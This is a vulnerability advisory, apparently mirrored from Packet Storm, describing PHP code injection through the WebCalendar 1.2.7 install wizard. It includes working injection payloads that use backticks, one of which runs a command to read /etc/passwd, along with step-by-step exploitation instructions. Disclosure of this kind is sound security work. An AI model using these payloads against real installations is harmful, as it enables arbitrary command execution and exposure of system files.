WebCalendar 1.2.7 PHP Code Injection

2016-07-04T00:00:00
ID PACKETSTORM:137761
Type packetstorm
Reporter hyp3rlinx
Modified 2016-07-04T00:00:00

Description

                                        
                                            `[+] Credits: John Page aka HYP3RLINX  
  
[+] Website: hyp3rlinx.altervista.org  
  
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-PHP-CODE-INJECTION.txt  
  
[+] ISR: ApparitionSec  
  
  
  
Vendor:  
==========================  
www.k5n.us/webcalendar.php  
  
  
  
Product:  
==================  
WebCalendar v1.2.7  
  
WebCalendar is a PHP-based calendar application that can be configured as a  
single-user calendar, a multi-user calendar for groups of users, or as an  
event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2,  
Interbase, MS SQL Server, or ODBC is required.  
  
WebCalendar can be setup in a variety of ways, such as...  
  
A schedule management system for a single person  
A schedule management system for a group of people, allowing one or more  
assistants to manage the calendar of another user  
An events schedule that anyone can view, allowing visitors to submit new  
events  
A calendar server that can be viewed with iCalendar-compliant calendar  
applications like Mozilla Sunbird, Apple iCal or GNOME Evolution or  
RSS-enabled  
applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress.  
  
  
  
Vulnerability Type:  
======================  
PHP Code Injection  
  
  
  
CVE Reference:  
==============  
N/A  
  
  
  
Vulnerability Details:  
=====================  
  
Since WebCalendars install script is not removed after installation as  
there is no "automatic" removal of it, low privileged users can inject  
arbitrary  
PHP code for the "Database Cache" directory value as no input validation  
exists for this when a user installs the application using the WebCalendar  
walk  
thru wizard.  
  
If WebCalendars installation script is available as part of a default  
image, often as a convenience by some hosting providers, this can be used  
to gain  
code execution on the target system. The only item that is required is the  
user must have privileges to authenticate to the MySQL Database and to run  
the  
install script. So, users who have install wizard access for the  
WebCalendar application will now have ability to launch arbitrary system  
commands on the  
affected host.  
  
One problem we must overcome is WebCalendar filters quotes " so we cannot  
use code like <?php echo "/bin/cat /etc/passwd"; ?> However, we can defeat  
this  
obstacle using the all to forgotten backtick `CMD` operator!.  
  
e.g.  
  
*/?><?php echo `/bin/cat /etc/passwd`; ?>  
  
This results in "settings.php" being injected like...  
  
<?php  
/* updated via install/index.php on Wed, 15 Jun 2016 09:44:34 -0400  
install_password: e99a18c428cb38d5f260853678922e03  
db_type: mysql  
db_host: localhost  
db_database: intranet  
db_login: admin  
db_password: abc123  
db_persistent: false  
db_cachedir: */?><?php echo `/bin/cat /etc/passwd`; ?>  
readonly: false  
user_inc: user.php  
use_http_auth: false  
single_user: false  
# end settings.php */  
?>  
  
  
  
Exploitation steps(s):  
=====================  
  
1) Login to the WebCalendar Installation Wizard.  
  
2) When you get to WebCalendar Installation Wizard Step 2 of the install  
script.  
http://localhost/WebCalendar-1.2.7/WebCalendar-1.2.7/install/index.php?action=switch&page=2  
  
3) Click "Test Settings" button to ensure connection to the Database.  
4) Enter below PHP code for the "Database Cache Directory:" input fields  
value to pop calculator for POC (Windows).  
  
*/?><?php exec(`calc.exe`); ?>  
  
5) Click "Next" button  
6) Click "Next" button  
7) Click "Save settings" button  
  
BOOOOOOOM! "settings.php" gets overwritten and injected with our PHP code.  
  
If you happen to get following error when clicking "Test Settings" button,  
"Failure Reason: Database Cache Directory does not exist", just click back  
button then forward or just "Test settings" button again to try get past  
the error.  
  
  
Disclosure Timeline:  
===============================  
Vendor Notification: No Replies  
July 4, 2016 : Public Disclosure  
  
  
  
Severity Level:  
================  
8.0 (High)  
CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H  
  
  
[+] Disclaimer  
The information contained within this advisory is supplied "as-is" with no  
warranties or guarantees of fitness of use or otherwise.  
Permission is hereby granted for the redistribution of this advisory,  
provided that it is not altered except by reformatting it, and  
that due credit is given. Permission is explicitly given for insertion in  
vulnerability databases and similar, provided that due credit  
is given to the author. The author is not responsible for any misuse of the  
information contained herein and accepts no responsibility  
for any damage caused by the use or misuse of this information. The author  
prohibits any malicious use of security related information  
or exploits by the author or elsewhere.  
  
HYP3RLINX  
`